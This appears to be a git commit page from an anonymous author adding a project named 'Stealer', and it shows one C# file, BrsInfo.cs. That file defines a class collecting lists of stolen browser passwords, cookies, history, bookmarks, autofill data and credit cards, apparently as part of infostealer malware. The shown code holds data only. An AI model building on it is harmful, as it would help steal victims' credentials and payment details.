This commit is contained in:
Anonymous
2023-07-29 23:37:10 +05:30
parent c6c629437c
commit 85f5411b6e
158 changed files with 220479 additions and 4 deletions

24
Stealer/BrsInfo.cs Normal file
View File

@@ -0,0 +1,24 @@
using System.Collections.Generic;
namespace Stealer;
public class BrsInfo
{
public List<Password> listps { get; set; } = new List<Password>();
public List<Cookie> listcookie { get; set; } = new List<Cookie>();
public List<Site> listhist { get; set; } = new List<Site>();
public List<Bookmark> listbmark { get; set; } = new List<Bookmark>();
public List<AutoFill> listautofill { get; set; } = new List<AutoFill>();
public List<CreditCard> listcredit { get; set; } = new List<CreditCard>();
}